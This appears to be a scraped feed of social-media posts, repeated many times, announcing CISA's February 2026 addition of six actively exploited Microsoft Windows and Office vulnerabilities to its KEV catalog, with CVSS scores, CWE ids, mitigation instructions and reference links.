- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
β οΈ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
β οΈ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
β οΈ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
β οΈ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
β οΈ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21514
Vendor: Microsoft
Product: Office
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21514
βΌοΈ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##π CVE-2026-21514 - High (7.8)
Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21514/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21514
CVE-2026-21514
Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.
π CVSS Score: 7.8
β οΈ Severity: High
π¨ Exploited: true
π
Published: 10.02.2026, 18:16
π·οΈ Aliases: CVE-2026-21514
π‘οΈ CWE: CWE-807
π CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
π References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21514
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21514
Vendor: Microsoft
Product: Office
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21514
βΌοΈ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T21:31:29
12 posts
π CVE-2026-21513 - High (8.8)
Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21513/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21513
CVE-2026-21513
Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.
π CVSS Score: 8.8
β οΈ Severity: High
π¨ Exploited: true
π
Published: 10.02.2026, 18:16
π·οΈ Aliases: CVE-2026-21513
π‘οΈ CWE: CWE-693
π CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
π References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21513 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21513
π¨ [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
β οΈ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
β οΈ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
β οΈ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
β οΈ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
β οΈ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
β οΈ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21513
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21513
βΌοΈ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##π CVE-2026-21513 - High (8.8)
Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21513/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21513
CVE-2026-21513
Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.
π CVSS Score: 8.8
β οΈ Severity: High
π¨ Exploited: true
π
Published: 10.02.2026, 18:16
π·οΈ Aliases: CVE-2026-21513
π‘οΈ CWE: CWE-693
π CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
π References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21513 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21513
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21513
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21513
βΌοΈ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T21:31:29
11 posts
π CVE-2026-21519 - High (7.8)
Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21519/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21519
CVE-2026-21519
Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.
π CVSS Score: 7.8
β οΈ Severity: High
π¨ Exploited: true
π
Published: 10.02.2026, 18:16
π·οΈ Aliases: CVE-2026-21519
π‘οΈ CWE: CWE-843
π CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
π References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21519
π¨ [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
β οΈ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
β οΈ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
β οΈ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
β οΈ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
β οΈ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
β οΈ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21519
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21519
βΌοΈ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##π CVE-2026-21519 - High (7.8)
Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21519/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21519
CVE-2026-21519
Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.
π CVSS Score: 7.8
β οΈ Severity: High
π¨ Exploited: true
π
Published: 10.02.2026, 18:16
π·οΈ Aliases: CVE-2026-21519
π‘οΈ CWE: CWE-843
π CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
π References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21519
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21519
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
